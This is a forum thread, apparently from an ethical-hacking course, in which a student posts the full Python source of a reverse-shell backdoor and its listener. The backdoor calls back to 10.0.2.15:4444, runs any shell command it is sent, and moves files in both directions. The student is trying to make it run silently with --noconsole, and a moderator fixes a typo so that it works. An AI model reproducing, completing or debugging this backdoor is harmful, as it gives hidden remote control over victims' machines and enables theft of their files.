Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • #41758
    Peter Queen
    Participant

    Hello Diego,

    me again! i have a problem with executing command silently, the program was working fine up until I added the –noconsole command.

    Now the connection get established but when I try to execute any command nothing happens until I have to stop it with Ctrl C.

    Here is the listener code:

    #!/usr/bin/env python
    
    import socket
    import json
    import base64
    
    class Listener:
        def __init__(self, ip, port):
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            self.connection, address = listener.accept()
            print("[+] Connection established from " + str(address))
    
        def reliable_send(self, data):
            json_data = json.dumps(data)
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            self.reliable_send(command)
            if command[0] == "exit":
                self.connection.close()
                exit()
    
            return self.reliable_receive()
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(base64.b64dencode(content))
                return "[+] Download successful"
    
        def read_file(self, path):
            with open(path, "rb") as file:
                return base64.b64encode(file.read())
    
        def run(self):
            while True:
                command = raw_input(">> ")
                command = command.split(" ")
                try:
                    if command[0] == "upload":
                        file_content = self.read_file(command[1])
                        command.append(file_content)
    
                    result = self.execute_remotely(command)
    
                    if command[0] == "download" and "[-] Error " not in result:
                        result = self.write_file(command[1], result)
                except Exception:
                    result = "[-] Error during command execution"
    
                print(result)
    
    my_listener = Listener("10.0.2.15", 4444)
    my_listener.run()

    and here is the reverse backdoor:

    ##!/usr/bin/env python
    
    import socket
    import subprocess
    import json
    import os 
    import base64
    import sys
    
    class Backdoor:
        def __init__(self, ip, port):
            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.connection.connect((ip, port))
    
        def reliable_send(self, data):
            json_data = json.dumps(data)
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_system_command(self, command):
            DEVNULL = open(os.devnull, "wb")
            return subprocess.check_output(command, shell=True, stdeer=DEVNULL, stdin=DEVNULL)
    
        def change_working_directory_to(self, path):
            os.chdir(path)
            return "[+] Changing working directory to " + path
    
        def read_file(self, path):
            with open(path, "rb") as file:
                return base64.b64encode(file.read())
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(base64.b64decode(content))
                return "[+] Upload successful"
    
        def run(self):
            while True:
                command = self.reliable_receive()
                
                try:
                    if command[0] == "exit":
                        self.connection.close()
                        sys.exit()
                    elif command[0] == "cd" and len(command) > 1:
                        command_result = self.change_working_directory_to(command[1])
                    elif command[0] == "download":
                        command_result = self.read_file(command[1])
                    elif command[0] == "upload":
                        command_result = self.write_file(command[1], command[2])
                    else:
                        command_result = self.execute_system_command(command)
                    self.reliable_send(command_result)
                except Exception:
                    command_result = "[-] Error during command execution"
    
    my_backdoor = Backdoor("10.0.2.15", 4444)
    my_backdoor.run()

    I watched the lesson several time to see if I made a mistake but I cant spot it.

    Thanks

    #41760
    Peter Queen
    Participant

    P.S. Although it doesn’t show in the post the two dash are separate before the word noconsole.

    #41781
    Diego PérezDiego Pérez
    Moderator

    Hi Peter!
    You have a typo in this line:
    stdeer=DEVNULL
    It should be stderr, so change it and let me know how it goes!

    Are you getting any errors while compiling it? Are you doing it in windows or linux?

    Let me know.
    Diego

Viewing 3 posts - 1 through 3 (of 3 total)
  • You must be logged in to reply to this topic.